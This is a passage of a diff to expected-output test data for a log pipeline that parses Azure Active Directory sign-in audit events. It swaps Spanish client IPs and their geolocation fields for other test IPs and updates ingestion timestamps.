Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"5a3435d0-229a-41c8-bd21-b4f2b662d0f6\",\"InterSystemsId\":\"4836e306-1460-4f34-ab55-a74c9a14f50d\",\"IntraSystemId\":\"2fde8302-c39e-40b6-9c7f-1bb9d4800a00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970160100Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:38:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"5a3435d0-229a-41c8-bd21-b4f2b662d0f6\",\"InterSystemsId\":\"4836e306-1460-4f34-ab55-a74c9a14f50d\",\"IntraSystemId\":\"2fde8302-c39e-40b6-9c7f-1bb9d4800a00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -2480,25 +2162,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2512,7 +2176,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -2562,7 +2226,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -2574,12 +2238,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051533Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"5aff2d1c-b203-46a6-96f0-b8f908f0e968\",\"InterSystemsId\":\"4a50a549-adf3-4a22-9037-7fd8cd3d0116\",\"IntraSystemId\":\"1d856a16-b179-41ab-9c0d-af1d2b925100\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970163400Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"5aff2d1c-b203-46a6-96f0-b8f908f0e968\",\"InterSystemsId\":\"4a50a549-adf3-4a22-9037-7fd8cd3d0116\",\"IntraSystemId\":\"1d856a16-b179-41ab-9c0d-af1d2b925100\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -2618,25 +2282,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2650,7 +2296,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -2700,7 +2346,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -2712,12 +2358,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "83.57.233.151",
- "ip": "83.57.233.151"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051535800Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3d8033cf-eecd-4eee-87a5-795efd8a1d3d\",\"InterSystemsId\":\"4e44a55e-9c0d-4cea-b000-1b79e96dcf57\",\"IntraSystemId\":\"fc33c54e-38b9-4ef2-a4ee-a3a324a45500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970167700Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3d8033cf-eecd-4eee-87a5-795efd8a1d3d\",\"InterSystemsId\":\"4e44a55e-9c0d-4cea-b000-1b79e96dcf57\",\"IntraSystemId\":\"fc33c54e-38b9-4ef2-a4ee-a3a324a45500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -2756,25 +2402,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "79.159.10.151"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -2788,7 +2416,7 @@
 "ObjectId": "Unknown",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Redirect",
@@ -2838,7 +2466,7 @@
 "asr"
 ],
 "ip": [
- "79.159.10.151"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -2850,12 +2478,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "79.159.10.151",
- "ip": "79.159.10.151"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051538500Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8bd0a250-74f6-4eeb-ba20-c5bdbd977013\",\"InterSystemsId\":\"4e91c3e1-819e-4ebc-ae68-2037cfc2db92\",\"IntraSystemId\":\"a063e495-5883-4837-8186-5828f9f2d500\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970173200Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8bd0a250-74f6-4eeb-ba20-c5bdbd977013\",\"InterSystemsId\":\"4e91c3e1-819e-4ebc-ae68-2037cfc2db92\",\"IntraSystemId\":\"a063e495-5883-4837-8186-5828f9f2d500\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -2894,25 +2522,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -2926,7 +2536,7 @@
 "ObjectId": "00000003-0000-0ff1-ce00-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "213.97.47.133",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "True",
 "ResultStatusDetail": "Redirect",
@@ -2976,7 +2586,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -2988,12 +2598,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "213.97.47.133",
- "ip": "213.97.47.133"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051541300Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"08e18876-6177-487e-b8b5-cf950c1e598c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558\",\"InterSystemsId\":\"50d648cb-466d-4cf4-b2f8-3b7e84f47040\",\"IntraSystemId\":\"64613cae-510d-4a52-b486-070b775e5800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970178600Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"08e18876-6177-487e-b8b5-cf950c1e598c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558\",\"InterSystemsId\":\"50d648cb-466d-4cf4-b2f8-3b7e84f47040\",\"IntraSystemId\":\"64613cae-510d-4a52-b486-070b775e5800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3032,25 +2642,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "79.159.10.151"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -3064,7 +2656,7 @@
 "ObjectId": "00000002-0000-0000-c000-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Success",
@@ -3114,7 +2706,7 @@
 "asr"
 ],
 "ip": [
- "79.159.10.151"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -3126,12 +2718,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "79.159.10.151",
- "ip": "79.159.10.151"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051544200Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"19d57a4a-d32e-4dc6-971f-3491bc440023\",\"InterSystemsId\":\"5a453031-0cc3-4577-a589-4c3bf37eed78\",\"IntraSystemId\":\"814a32f0-27fd-4e82-855c-13da15a4c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970184500Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"19d57a4a-d32e-4dc6-971f-3491bc440023\",\"InterSystemsId\":\"5a453031-0cc3-4577-a589-4c3bf37eed78\",\"IntraSystemId\":\"814a32f0-27fd-4e82-855c-13da15a4c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft